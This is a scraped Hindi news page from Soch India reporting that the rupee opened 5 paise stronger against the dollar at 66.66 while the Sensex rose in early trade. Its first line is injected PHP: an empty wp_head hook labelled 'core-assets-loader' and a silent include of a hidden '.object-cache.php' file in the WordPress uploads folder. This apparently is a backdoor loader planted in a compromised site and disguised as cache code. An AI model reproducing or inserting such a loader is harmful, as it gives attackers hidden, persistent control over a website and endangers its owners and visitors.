add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); डॉलर के मुकाबले रुपया 5 पैसे बढ़त के साथ खुला – SOCH INDIA
Menu

व्यापार
डॉलर के मुकाबले रुपया 5 पैसे बढ़त के साथ खुला

nobanner

निर्यातकों और बैंकों द्वारा अमेरिकी मुद्रा की बिकवाली से रुपया आज अंतरबैंक विदेशी विनिमय बाजार में शुरूआती कारोबार में 5 पैसे मजबूत होकर 66.66 पर खुला.

विदेशी मुद्रा कारोबारियों के अनुसार विश्व की अन्य प्रमुख मुद्राओं की तुलना में डॉलर के कमजोर होने के बीच विदेशी कोष प्रवाह मजबूत बने रहने और घरेलू शेयर बाजार में अच्छी शुरूआत से भी रुपये की धारणा को बल मिला.

डॉलर के मुकाबले रुपया कल 10 पैसे मजबूत होकर 66.71 पर बंद हुआ था.

इस बीच, बंबई शेयर बाजार का सेंसेक्स शुरूआती कारोबार में 49.8 अंक या 0.17 प्रतिशत की बढ़त के साथ 29,098.17 अंक पर खुला.